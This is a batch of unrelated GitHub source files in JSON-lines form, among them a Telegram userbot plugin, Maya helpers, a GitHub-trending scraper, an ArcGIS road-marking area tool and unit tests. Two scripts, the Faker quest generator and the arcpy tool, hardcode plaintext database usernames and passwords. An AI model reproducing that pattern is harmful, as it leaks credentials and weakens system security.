'jupyter_client==5.2.3', 'IPython', 'ipykernel', 'requests', 'jinja2'\n ],\n include_package_data=True,\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Education',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: Microsoft :: Windows',\n 'Operating System :: POSIX',\n 'Programming Language :: Python :: 3',\n ],\n)\n","repo_name":"HelgeCPH/kotlin_kernel","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"39580437648","text":"import logging\r\n\r\n#初始化,相当于 实例化\r\nlogger = logging.getLogger('test_log')\r\n\r\n#设置级别\r\nlogger.setLevel(logging.DEBUG) #设置最低级别,小于它的级别都不记录\r\n\r\n#定义Handler\r\n #定义控制台输出handler\r\nsh = logging.StreamHandler()\r\nsh.setLevel(logging.ERROR) # error情况下才会在控制台输出,低于它的都不会再控制台输出\r\n\r\n #记录到文件里边\r\nfh = logging.FileHandler('test_file.log')\r\nfh.setLevel(logging.DEBUG) # debug级别以上才会写入log文件里面去\r\n#格式化\r\nformatter = logging.Formatter(\r\n '时间:%(asctime),s'\r\n '日志级别:%(levelname)s,'\r\n '日志消息:%(message)s'\r\n)\r\n#定义格式化传到控制台文件 以规定格式显示\r\nsh.setFormatter(formatter) #控制台\r\nfh.setFormatter(formatter) #文件\r\n\r\n#启动日志文件 添加handler到对象里去\r\nlogger.addHandler(sh)\r\nlogger.addHandler(sh)\r\n\r\n#测试\r\nif __name__ == '__main__':\r\n # logger.debug('测试中')\r\n # logger.info('正常运行')\r\n # logger.warn('警告')\r\n # logger.error('报错')\r\n # logger.critical('已经不能正常运行了')\r\n\r\n def fun(a): #日志记录函数\r\n try:\r\n num = 20 / a\r\n logger.info(num) #如果不报错,代表正常运行\r\n except Exception as e:\r\n logger.error(e) #如果报错就警告\r\nfun(0)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"znzhhy/Advanced","sub_path":"classroom/logging模块.py","file_name":"logging模块.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30734784220","text":"# inspired from uniborg Quotes plugin\nimport random\n\nimport requests\n\nfrom userbot import catub\n\nfrom ..core.logger import logging\nfrom ..core.managers import edit_delete, edit_or_reply\nfrom ..helpers import catmemes\n\nLOGS = logging.getLogger(__name__)\nplugin_category = \"extra\"\n\n\n@catub.cat_cmd(\n pattern=\"quote(?: |$)(.*)\",\n command=(\"quote\", plugin_category),\n info={\n \"header\": \"To get random quotes on given topic.\",\n \"description\": \"An api that Fetchs random Quote from `goodreads.com`\",\n \"usage\": \"{tr}quote \",\n \"examples\": \"{tr}quote love\",\n },\n)\nasync def quote_search(event):\n \"shows random quotes on given topic.\"\n catevent = await edit_or_reply(event, \"`Processing...`\")\n input_str = event.pattern_match.group(1)\n if not input_str:\n api_url = \"https://quotes.cwprojects.live/random\"\n try:\n response = requests.get(api_url).json()\n except Exception:\n response = None\n else:\n api_url = f\"https://quotes.cwprojects.live/search/query={input_str}\"\n try:\n response = random.choice(requests.get(api_url).json())\n except Exception:\n response = None\n if response is not None:\n await catevent.edit(f\"`{response['text']}`\")\n else:\n await edit_delete(catevent, \"`Sorry Zero results found`\", 5)\n\n\n@catub.cat_cmd(\n pattern=\"pquote$\",\n command=(\"pquote\", plugin_category),\n info={\n \"header\": \"To get random quotes on programming.\",\n \"usage\": \"{tr}pquote\",\n },\n)\nasync def _(event):\n \"Shows random programming quotes\"\n txt = random.choice(catmemes.PROGQUOTES)\n await edit_or_reply(event, txt)\n","repo_name":"immortal1256/ToxicOp","sub_path":"userbot/plugins/quotes.py","file_name":"quotes.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37817766734","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nModule that contains functions related to nodes selection.\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom typing import List\n\nimport maya.cmds as cmds\nimport maya.mel as mel\n\n\ndef selection_type(selection: List[str]) -> str | None:\n\t\"\"\"\n\tReturns the \"object\" or \"component\" or \"uv\" type depending on the first type of the given selection.\n\n\t:param List[str] selection: selected objects, components or UVs.\n\t:return: selected component type (\"component\", \"object\" or \"uv\").\n\t:rtype: str or None\n\t\"\"\"\n\n\tif not selection:\n\t\treturn None\n\n\tif '.' not in selection[0]:\n\t\treturn 'object'\n\telif '.vtx[' in selection[0]:\n\t\treturn 'component'\n\telif '.e[' in selection[0]:\n\t\treturn 'component'\n\telif '.f[' in selection[0]:\n\t\treturn 'component'\n\telif '.map[' in selection[0]:\n\t\treturn 'uv'\n\n\treturn None\n\n\ndef components_type(components: List[str]) -> str | None:\n\t\"\"\"\n\tReturns the \"object\" or \"component\" or \"uv\" type depending on the first type of the given selection.\n\n\t:param List[str] components: selected objects, components or UVs.\n\t:return: selected component type (\"object\", \"vertices\", \"edges\", \"faces\" or \"uvs\").\n\t:rtype: str or None\n\t\"\"\"\n\n\tif not components:\n\t\treturn None\n\n\tif '.' not in components[0]:\n\t\treturn 'object'\n\telif '.vtx[' in components[0]:\n\t\treturn 'vertices'\n\telif '.e[' in components[0]:\n\t\treturn 'edges'\n\telif '.f[' in components[0]:\n\t\treturn 'faces'\n\telif '.map[' in components[0]:\n\t\treturn 'uvs'\n\n\treturn None\n\n\ndef convert_selection(type_to_convert: str = 'faces') -> List[str]:\n\t\"\"\"\n\tConverts current selection to the given selection type. Supported selection types:\n\t\t\"faces\", \"vertices\", \"edges\", \"edgeLoop\", \"edgeRing\", \"edgePerimeter\", \"uvs\", \"uvShll\", \"uvShellBorder\"\n\n\t:param str type_to_convert: selection to convert to.\n\t:return: converted selection.\n\t:rtype: List[str]\n\t\"\"\"\n\n\tif type_to_convert == 'faces':\n\t\tmel.eval('ConvertSelectionToFaces;')\n\telif type_to_convert == 'vertices':\n\t\tmel.eval('ConvertSelectionToVertices;')\n\telif type_to_convert == 'edges':\n\t\tmel.eval('ConvertSelectionToEdges;')\n\telif type_to_convert == 'uvs':\n\t\tmel.eval('ConvertSelectionToUVs;')\n\telif type_to_convert == 'edgeLoop':\n\t\tmel.eval('SelectEdgeLoopSp;')\n\telif type_to_convert == 'edgeRing':\n\t\tmel.eval('SelectEdgeRingSp;')\n\telif type_to_convert == 'edgePerimeter':\n\t\tmel.eval('ConvertSelectionToEdgePerimeter;')\n\telif type_to_convert == 'uvShell':\n\t\tmel.eval('ConvertSelectionToUVShell;')\n\telif type_to_convert == 'uvShellBorder':\n\t\tmel.eval('ConvertSelectionToUVShellBorder;')\n\t\n\treturn cmds.ls(selection=True)\n","repo_name":"tpoveda/tp-dcc-tools","sub_path":"packages/tp-dcc-maya/tp/maya/cmds/nodes/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"15168919077","text":"from faker import Faker\nfrom random import randint\nfrom random import uniform\nfrom random import choice\nimport datetime\nimport sys\nimport json\nimport psycopg2\nN = 10\n\nquest_types = [\"Основной\", \"Второстепенный\"]\nquest_issuings = [\"Йеннифэр\", \"Доска объявлений\", \"Письмо\", \"Трисс Меригольд\"]\n\ndef num_of_quests():\n try:\n\n con = psycopg2.connect(\n database=\"Witcher\",\n user=\"erlendum\",\n password=\"parasha\",\n host=\"localhost\",\n port=\"5432\"\t\t \n )\n except:\n print(\"Ошибка при подключении к Базе Данных\")\n return\n cur = con.cursor()\n\n cur.execute(\"SELECT max(quest_id) from witcher.quests;\")\n\n rows = cur.fetchall()\n\n cur.close()\n con.close()\n return rows[0][0]\n\n\ndef generate_quests(num):\n faker = Faker(locale=\"ru_RU\")\n f = open(str(sys.argv[1]) + '_quests_' + str(datetime.datetime.now().strftime(\"%d-%m-%Y_%H:%M:%S\")) + '.json', 'w', encoding='utf8')\n f.write('[\\n')\n for i in range(N):\n quest_type_id = randint(0, len(quest_types) - 1)\n quest_issuing_id = randint(0, len(quest_issuings) - 1)\n obj = {}\n obj['quest_id'] = num + i + 1\n obj['quest_name'] = faker.text()\n obj['quest_type'] = quest_types[quest_type_id]\n obj['quest_issuing'] = quest_issuings[quest_issuing_id]\n obj['quest_reward'] = str(randint(0, 500)) + ' оренов'\n\n if i != N - 1:\n f.write(json.dumps(obj, ensure_ascii=False) + ', \\n')\n else:\n f.write(json.dumps(obj, ensure_ascii=False) + '\\n')\n f.write(']')\n f.close()\n\nnum = num_of_quests()\ngenerate_quests(num)","repo_name":"Erlendum/BMSTU_DB","sub_path":"labs/lab_08/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16593508025","text":"from django.conf import settings as django_settings\nfrom google.appengine.api import users\nfrom common import component\nfrom common import util\n\n\ndef settings(request):\n\n d = dict([(k, getattr(django_settings, k))\n for k in django_settings.get_all_members()])\n return dict(**d)\n\ndef components(request):\n return {'component': component}\n\ndef flash(request):\n if 'flash' not in request.REQUEST:\n return {}\n\n flash = request.REQUEST['flash']\n nonce = util.create_nonce(None, flash)\n if nonce != request.REQUEST.get('_flash', ''):\n return {}\n return {'flash': flash}\n\ndef gaia(request):\n try:\n gaia_user = users.GetCurrentUser()\n gaia_login = users.CreateLoginURL(request.META['PATH_INFO'])\n gaia_logout = users.CreateLogoutURL('/logout')\n except:\n gaia_user = None\n gaia_login = \"gaia_login\"\n gaia_logout = \"gaia_logout\"\n return locals()\n","repo_name":"anhpt379/Inforlearn","sub_path":"common/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33567650124","text":"#!/usr/bin/python\n#imports\nimport rospy\nfrom image_echo.msg import HSV\n\nclass HSVChanger():\n '''\n Allows a user to change HSV values on the fly\n '''\n def __init__(self):\n '''\n initializes the node\n :param self: the node itself\n '''\n rospy.init_node(\"HSVman\", anonymous=False) #creates the node\n self.pub = rospy.Publisher(\"/hsv\", HSV, queue_size=1) #makes a publisher\n \n rospy.on_shutdown(self.on_shutdown) #defines the shutdown function for killing the node \n\n\n self.rate = 10 #rate of publishing\n r = rospy.Rate(self.rate)\n\n self.is_running = True\n while is_running:\n\n value = input(\"Input Upper H, S, or V (uh, us, uv) or Lower H, S, V (lh, ls, lv)\")\n \n self.my_message = HSV()\n print(value)\n \n \n\n def on_shutdown(self):\n self.is_running = false\n print(\"ded\")\n","repo_name":"GSSM-ROS/2017-racecar-63","sub_path":"image_echo/src/HsvRuntime.py","file_name":"HsvRuntime.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69887771640","text":"'''\nDesafio:\n\nUtilize os pacotes Python requests e BeautifulSoup para extrair os 10 projetos mais populares do GitHub. Acesse o link https://github.com/trending\n\nEscreva os dados extraídos no arquivo csv github.csv separado por ;\n'''\n\nimport requests\nimport csv\nfrom bs4 import BeautifulSoup as soup\nfrom requests.exceptions import HTTPError\n\nconteudo = None\n\ntry:\n # Faz a requisição HTTP para a página\n resposta = requests.get('https://github.com/trending')\n resposta.raise_for_status()\nexcept HTTPError as exc:\n print(exc)\nelse:\n # Obtém o conteúdo da resposta\n conteudo = resposta.text\n\n# Faz o parsing do conteúdo HTML utilizando a biblioteca BeautifulSoup\npagina = soup(conteudo, 'html.parser')\n\n# Obtendo os repositórios\nrepositorios = pagina.find_all(\"article\", class_=\"Box-row\")\n\n# Abre o arquivo CSV no modo de append\nwith open(file='./arquivos/github.csv', mode='a', newline='', encoding='utf8') as arquivo:\n # Cria um objeto writer do módulo csv\n escrever = csv.writer(arquivo, delimiter=';')\n\n # Escreve o cabeçalho\n escrever.writerow(['ranking', 'project', 'language',\n 'stars', 'stars_today', 'forks'])\n\n # Iterando pelos repositórios e extraindo informações\n for i, repositorio in enumerate(repositorios[:10], start=1):\n # Obtendo o título\n titulo = repositorio.find(\"h2\")\n # Separando o título em usuário e repositório\n titulo = titulo.text.strip().replace(\"\\n\", \"\").replace(\" \", \"\").split(\"/\")\n usuario = titulo[0]\n projeto = titulo[1]\n\n # Obtendo a linguagem\n linguagens_tag = repositorio.find(\n \"span\", itemprop=\"programmingLanguage\")\n if linguagens_tag:\n linguagem = linguagens_tag.text.strip()\n\n # Obtendo o número de estrelas\n estrelas_tag = repositorio.find(\n \"a\", class_=\"Link--muted d-inline-block mr-3\")\n if estrelas_tag:\n estrelas = estrelas_tag.text.strip()\n\n # Obtendo o total de forks\n forks_tag = repositorio.find(\"a\", href=f\"/{usuario}/{projeto}/forks\")\n if forks_tag:\n forks = forks_tag.text.strip()\n\n # Obtendo o total de estelas do dia\n estrelas_hoje_tag = repositorio.find(\n \"span\", class_=\"d-inline-block float-sm-right\")\n if estrelas_hoje_tag:\n estrelas_hoje = estrelas_hoje_tag.text.strip().replace(\" \",\n \"/\").split(\"/\")[0]\n\n # Escreve os dados no arquivo CSV\n escrever.writerow(\n [i, projeto, linguagem, estrelas, estrelas_hoje, forks])\n\n# Mensagem de sucesso\nprint('Trending CSV gerado com sucesso!')\n","repo_name":"ronaldoaires/ebac-analista-de-dados","sub_path":"desafios/03-github-trending.py","file_name":"03-github-trending.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44316489401","text":"import sys\nfrom logging import Logger, Formatter, StreamHandler, Filter, LogRecord\nfrom logging import getLogger, addLevelName, getLevelName\nfrom logging import DEBUG, INFO\n\n\"\"\"\nhttps://docs.python.org/3/howto/logging.html#configuring-logging-for-a-library\n\nNote It is strongly advised that you do not log to the root logger in your library. Instead, use a logger with a unique and easily identifiable name, such as the __name__ for your library’s top-level package or module. Logging to the root logger will make it difficult or impossible for the application developer to configure the logging verbosity or handlers of your library as they wish.\n\"\"\"\n_is_configured: bool = False\n\n# Define TRACE log level\nTRACE = 1\n\n# \"Register\" new loggin level\naddLevelName(TRACE, 'TRACE') \n\n# Verify\nassert getLevelName(TRACE) == 'TRACE'\n\n\ndef configure_logging(level: int = DEBUG) -> None: \n global _is_configured\n if _is_configured:\n return\n\n # Reconfiguring the logger here will also affect test running in the PyCharm IDE (i.e. IntelliJ Python plugin)\n # and VS Code IDE\n root_logger: Logger = getLogger()\n root_logger.setLevel(level)\n formatter: Formatter = Formatter('%(relativeCreated)d (%(name)s) | %(levelname)s | [%(module)s:%(lineno)s] | %(funcName)s | %(message)s')\n console_handler: StreamHandler = StreamHandler(sys.stdout)\n console_handler.setFormatter(formatter)\n root_logger.addHandler(console_handler)\n\n introspect_logger: Logger = getLogger(\"common.introspect\")\n introspect_logger.setLevel(INFO)\n\n page_dump_logger: Logger = getLogger(\"roampub.page_dump\")\n page_dump_logger.setLevel(level)\n\n roam_model_logger: Logger = getLogger(\"roampub.roam_model\")\n roam_model_logger.setLevel(level)\n\n _is_configured = True\n\n\nclass FunctionFilter(Filter):\n \"\"\"\n Filters *out* ``LogRecord`` based on function name\n \"\"\"\n def __init__(self, function_names: list[str]):\n self._function_names = function_names\n\n def filter(self, record: LogRecord) -> bool:\n return not record.funcName in self._function_names\n","repo_name":"jpanico/roam","sub_path":"publisher/common/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41514986125","text":"from qiniu import Auth\nfrom qiniu import BucketManager\n\naccess_key = 'your_AK'\nsecret_key = 'your_SK'\n\n#初始化Auth状态\nq = Auth(access_key, secret_key)\n#初始化BucketManager\nbucket = BucketManager(q)\n\n#你要测试的空间, 并且这个key在你空间中存在\nbucket_name = '2018_11_16'\nkey = 'test11.png'\n#将文件从文件key 移动到文件key2,可以实现文件的重命名 可以在不同bucket移动\nbucket_name2 = 'app-download'\nkey2 = '我是被移动的测试资源.png'\nret, info = bucket.move(bucket_name, key, bucket_name2, key2)\nprint(info)\nassert ret == {}","repo_name":"pasca520/qiniu","sub_path":"kodo/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29882812893","text":"class Solution():\n\tdef canJump(nums:list) -> bool:\n\t\t# O(n) time greedy\n\t\tfurthestIDX = 0\n\n\t\tfor i in range(len(nums)):\n\t\t\tIDX = i + nums[i]\n\t\t\tfurthestIDX = max(furthestIDX, IDX)\n\t\t\tif furthestIDX < i+1:\n\t\t\t\tbreak\n\n\t\tif furthestIDX < len(nums)-1:\n\t\t\treturn False\n\t\treturn True\n\n\tdef canJump2(nums:list) -> bool:\n\t\t# O(n^2) time dynamic programming\n\t\tcache = {}\n\t\t\n\t\tdef canReachLastIdx(idx):\n\t\t\tif idx in cache:\n\t\t\t\treturn cache[idx]\n\n\t\t\tif idx == len(nums)-1:\n\t\t\t\treturn True\n\n\t\t\tfor i in range(nums[idx]):\n\t\t\t\tif canReachLastIdx(idx + i + 1):\n\t\t\t\t\tcache[idx] = True\n\t\t\t\t\treturn cache[idx]\n\n\t\tif canReachLastIdx(0):\n\t\t\treturn True\n\t\treturn False\n\nnums = [2,3,1,1,4]\n# nums = [3,2,1,0,4]\n\nprint(Solution.canJump(nums))\nprint(Solution.canJump2(nums))","repo_name":"alfiyandyhr/leetcodes","sub_path":"55_JumpGame.py","file_name":"55_JumpGame.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24973517076","text":"import arcpy\nimport os\nimport json\nimport unicodedata\nimport tempfile, shutil\n\n# def by_territory(layer, territories, output):\n# arcpy.MakeFeatureLayer_management(\"https://services1.arcgis.com/usA3lHW20rGU6glp/ArcGIS/rest/services/Zenklu_prieziuros_teritorijos_view/FeatureServer/0\", \"Territory\")\n# for territory in territories:\n# if territory != \"Visa teritorija\":\n# arcpy.MakeFeatureLayer_management(\"Territory\", territory, \"SENIUNIJA = '{}'\".format(territory))\n# arcpy.analysis.Clip(layer, territory, output + \"_\" + territory, None)\n# else:\n# arcpy.analysis.Clip(layer, \"Territory\", output + \"_all_territories\", None)\n\ndef hz_line(hz, marking):\n area = 0\n with arcpy.da.SearchCursor(hz, (\"KET_NR\", \"SHAPE@LENGTH\", \"Plotas\", \"ZENKL_BUDAS\")) as cursor:\n for row in cursor:\n if row[3] == marking:\n if row[0] == 11: area += row[1]*0.12\n elif row[0] == 110: area += row[1]*0.12 + row[1]*0.0396\n elif row[0] == 111: area += row[1]*0.5\n elif row[0] == 112: area += row[1]*0.175\n elif row[0] == 1131: # nes daznai Plotas yra Null\n if row[2]:\n area += row[1]*0.5*row[2]\n else:\n area += row[1]*0.5*3.5\n elif row[0] == 1132: area += row[1]*0.2035\n elif row[0] == 1133: area += row[1]*0.0286\n elif row[0] == 114: area += row[1]*0.5\n elif row[0] == 12: area += row[1]*0.25\n elif row[0] == 122: area += row[1]*0.125\n elif row[0] == 125: area += row[1]*0.5\n elif row[0] == 126: area += row[1]*0.12\n elif row[0] == 127: area += row[1]*0.37036\n elif row[0] == 13: area += row[1]*0.24\n elif row[0] == 14: area += row[1]*0.12\n elif row[0] == 15: area += row[1]*0.0396\n elif row[0] == 16: area += row[1]*0.0792\n elif row[0] == 17: area += row[1]*0.06\n elif row[0] == 18: area += row[1]*0.0825\n elif row[0] == 19: area += row[1]*0.06\n return area\n\ndef hz_polygon(hz, marking):\n area = 0\n with arcpy.da.SearchCursor(hz, (\"KET_NR\", \"SHAPE@AREA\", \"ZENKL_BUDAS\")) as cursor:\n for row in cursor:\n if row[2] == marking:\n if row[0] == 1151: area += row[1]*0.35\n elif row[0] == 1152: area += row[1]*0.35\n elif row[0] == 1153: area += row[1]*0.35\n elif row[0] == 132: area += row[1]*0.2\n elif row[0] == 1322: area += row[1]*0.18\n return area\n\ndef hz_point(hz, marking):\n area = 0\n with arcpy.da.SearchCursor(hz, (\"KET_NR\", \"ZENKL_BUDAS\")) as cursor:\n for row in cursor:\n if row[1] == marking:\n if row[0] == 1161: area += 1.44\n elif row[0] == 1162: area += 1.82\n elif row[0] == 1163: area += 1.82\n elif row[0] == 1164: area += 2.62\n elif row[0] == 1165: area += 2.62\n elif row[0] == 1166: area += 2.62\n elif row[0] == 1167: area += 2.62\n elif row[0] == 1168: area += 2.62\n elif row[0] == 1169: area += 4\n elif row[0] == 11611: area += 2.5\n elif row[0] == 11621: area += 2.5\n elif row[0] == 11631: area += 2.5\n elif row[0] == 11641: area += 3.5\n elif row[0] == 11651: area += 3.5\n elif row[0] == 11691: area += 5\n elif row[0] == 1171: area += 1.98\n elif row[0] == 1172: area += 1.98\n elif row[0] == 118: area += 2.05\n elif row[0] == 119: area += 2\n elif row[0] == 120: area += 6.5\n elif row[0] == 121: area += 2\n elif row[0] == 123: area += 0.5\n elif row[0] == 11231: area += 1\n elif row[0] == 11232: area += 1.5\n elif row[0] == 124: area += 0.5\n elif row[0] == 128: area += 2\n elif row[0] == 129: area += 2\n elif row[0] == 130: area += 2\n elif row[0] == 14: area += 1\n elif row[0] == 15: area += 1.5\n return area\n\ndef hz_stats(hz, marking):\n desc = arcpy.Describe(hz)\n shape = desc.shapeType\n if shape == \"Polyline\":\n return hz_line(hz, marking)\n elif shape == \"Polygon\":\n return hz_polygon(hz, marking)\n elif shape == \"Point\":\n return hz_point(hz, marking)\n\nsdeTempPath = tempfile.mkdtemp()\narcpy.CreateDatabaseConnection_management(sdeTempPath,'SDE1.sde','SQL_SERVER','jupiteris2','DATABASE_AUTH','geodinter', 'matavimai3', 'SAVE_USERNAME','VP_SDE1')\narcpy.env.workspace = sdeTempPath + '\\SDE1.sde'\n\nall_hz = []\ntotal_area = 0\n\nhz_name = {1: \"KZ_HZ_Linijos\", 2: \"KZ_HZ_Plotai\", 3: \"KZ_HZ_Taskai\"}\nfor i in [1, 2, 3]:\n all_hz.append(fr'VP_SDE1.INFRASTR.KELIO_ZENKLAI/VP_SDE1.INFRASTR.{hz_name[i]}')\n \narcpy.AddMessage(all_hz)\narcpy.AddMessage(sdeTempPath)\n\nterritories = [\"Šiaurinis\", \"Rytinis\", \"Pietinis\", \"Vakarinis\", \"Centrinis\"]\nmarking = arcpy.GetParameterAsText(1)\n\nkey_to_num = {\"Suma\": 0, \"Plastikas\": 1, \"Dazai\": 2, \"Metalas\": 3, \"Plyteles\": 4, \"Kitas\": 5, \"Asfaltas\": 6, \"Termoplastas\": 7, \"Antislydiminis plastikas\": 8}\nnum_to_key = {0: \"Suma\", 1: \"Plastikas\", 2: \"Dazai\", 3: \"Metalas\", 4: \"Plyteles\", 5: \"Kitas\", 6: \"Asfaltas\", 7: \"Termoplastas\", 8: \"Antislydiminis plastikas\"}\n\nif marking:\n markings = {\"Suma\": 0}\n marking_list = marking.replace(\"'\", \"\").split(\";\")\n temp_markings = dict.fromkeys(marking_list, 0)\n markings.update(temp_markings)\n markings = dict((key_to_num[key], value) for (key, value) in markings.items())\n\narcpy.MakeFeatureLayer_management(str(\"https://services1.arcgis.com/usA3lHW20rGU6glp/ArcGIS/rest/services/Zenklu_prieziuros_teritorijos_view/FeatureServer/0\"), \"Territory\")\n\nterritories_dict = {}\nfor territory in territories:\n territory_markings = {}\n for hz in all_hz:\n \n arcpy.MakeFeatureLayer_management(\"Territory\", territory, \"SENIUNIJA = '{}'\".format(territory))\n hz = arcpy.analysis.Clip(hz, territory, fr'in_memory/{territory}', None)\n\n if marking:\n for mark in markings:\n if mark == 0: continue\n temp_area = hz_stats(hz, mark)\n territory_markings.setdefault(mark, 0)\n territory_markings[mark] += temp_area\n markings[mark] += temp_area\n markings[0] += temp_area\n else:\n for i in range(1, 9):\n total_area += hz_stats(hz, i)\n \n if marking:\n territory_markings = dict((num_to_key[key], value) for (key, value) in territory_markings.items())\n territories_dict[territory] = territory_markings\n else:\n territories_dict[territory] = total_area\n\nnormalized_key = unicodedata.normalize('NFKD', \"\\u0160iaurinis\").encode('ASCII', 'ignore').decode('ASCII')\nterritories_dict[normalized_key] = territories_dict.pop(\"\\u0160iaurinis\")\n \ntotals = {}\nfor territory_data in territories_dict.values():\n for type_name, type_area in territory_data.items():\n if type_name not in totals:\n totals[type_name] = 0\n totals[type_name] += type_area\n\ntotal_area = sum(totals.values())\nterritories_dict[\"Visa teritorija\"] = {type_name: type_area for type_name, type_area in totals.items()}\nterritories_dict[\"Visa teritorija\"][\"Visi tipai\"] = total_area\n\nif marking:\n arcpy.SetParameter(0, json.dumps(territories_dict))\nelse:\n arcpy.SetParameter(0, total_area)\n\narcpy.Delete_management(\"in_memory\")\nshutil.rmtree(sdeTempPath)\n","repo_name":"JustasMit/EOP_stat","sub_path":"HZGeneralTool.py","file_name":"HZGeneralTool.py","file_ext":"py","file_size_in_byte":7761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71535351480","text":"from unittest import TestCase\nfrom unittest.mock import patch\n\nfrom slp_base.slp_base.errors import LoadingIacFileError\nfrom slp_cft.slp_cft.load.cft_loader import CloudformationLoader\n\n\nclass TestCloudformationLoader(TestCase):\n\n @patch('yaml.load')\n def test_valid_cft(self, yaml_mock):\n # GIVEN a mocked valid yaml source\n source = 'VALID CLOUDFORMATION FILE SOURCE'\n\n # AND a mock of the yaml load function\n yaml_load_result = {'resource': {'name': 'cft_resource'}}\n yaml_mock.side_effect = [yaml_load_result]\n\n # WHEN load function is called\n cft_loader = CloudformationLoader([source])\n cft_loader.load()\n\n # THEN a dict with the Cloudformation data is built\n yaml_mock.assert_called()\n assert cft_loader.get_cloudformation() == yaml_load_result\n\n @patch('yaml.load')\n def test_invalid_cft(self, yaml_mock):\n # GIVEN an invalid yaml source\n source = 'INVALID CLOUDFORMATION FILE SOURCE'\n\n # AND a mock of the yaml load function that returns an error\n yaml_load_error_msg = 'Cannot process given CFT file.'\n yaml_mock.side_effect = Exception(yaml_load_error_msg)\n\n # WHEN load function is called\n # THEN a LoadingIacFileError is raised\n cft_loader = CloudformationLoader([source])\n with self.assertRaises(LoadingIacFileError) as loading_error:\n cft_loader.load()\n\n # AND The error info is right\n assert str(loading_error.exception.title) == 'IaC file is not valid'\n assert str(loading_error.exception.message) == yaml_load_error_msg\n\n def test_empty_file(self):\n pass\n # GIVEN an empty yaml source\n source = ''\n\n # WHEN load function is called\n # THEN a LoadingIacFileError is raised\n cft_loader = CloudformationLoader([source])\n with self.assertRaises(LoadingIacFileError) as loading_error:\n cft_loader.load()\n\n # AND an empty IaC file message is on the exception\n assert str(loading_error.exception.title) == 'IaC file is not valid'\n assert str(loading_error.exception.message) == 'IaC file is empty'\n","repo_name":"iriusrisk/startleft","sub_path":"slp_cft/tests/unit/load/test_cft_loader.py","file_name":"test_cft_loader.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"40"} +{"seq_id":"6497547974","text":"from bs4 import BeautifulSoup\nimport subprocess\n\ndef get_new_notes() :\n with open(\"old_notes.html\") as file :\n soup = BeautifulSoup(file, 'lxml')\n\n with open(\"notes.html\") as file2 :\n soup2 = BeautifulSoup(file2, 'lxml')\n\n liste1 = []\n liste2 = []\n tbody1 = soup.tbody\n tbody2 = soup2.tbody\n\n for balise in tbody1.contents :\n if(balise.name == \"tr\") :\n ligne = balise.contents\n matiere = ligne[2]\n note = ligne[3]\n if(len(matiere.contents) == 1) :\n if(len(note.contents) == 1) :\n liste1.append(matiere.string)\n\n for balise in tbody2.contents :\n if(balise.name == \"tr\") :\n ligne = balise.contents\n matiere = ligne[2]\n note = ligne[3]\n if(len(matiere.contents) == 1) :\n if(len(note.contents) == 1) :\n liste2.append(matiere.string)\n\n for i in range (0, len(liste1)) :\n liste1[i] = liste1[i].strip()\n\n for i in range (0,len(liste2)) :\n liste2[i] = liste2[i].strip()\n\n if(len(liste1) <= len(liste2)) :\n for e in liste2 :\n if(e in liste1) :\n liste2.remove(e)\n\n return liste2\n\ndef get_actual_notes() :\n with open(\"notes.html\") as file :\n soup = BeautifulSoup(file, 'lxml')\n \n liste = []\n tbody = soup.tbody\n\n for balise in tbody.contents :\n if(balise.name == \"tr\") :\n ligne = balise.contents\n matiere = ligne[2]\n note = ligne[3]\n if(len(matiere.contents) == 1) :\n if(len(note.contents) == 1) :\n liste.append(matiere.string)\n \n for i in range (0, len(liste)) :\n liste[i] = liste[i].strip()\n\n return liste\n\ndef check_diff() :\n proc = subprocess.run([\"diff\", \"notes.html\", \"old_notes.html\"])\n return(0 if proc.returncode == 0 else 1)","repo_name":"Maxwelito/uca-grades-discord-bot","sub_path":"parse_html.py","file_name":"parse_html.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36068153070","text":"from dateutil.relativedelta import relativedelta\nfrom odoo import fields\nfrom odoo.tests.common import TransactionCase\n\n\nclass TestPurchaseOrderStockPickingDatePlanned(TransactionCase):\n\n def setUp(self):\n super().setUp()\n self.partner = self.env['res.partner'].create({\n 'name': 'Test partner',\n })\n 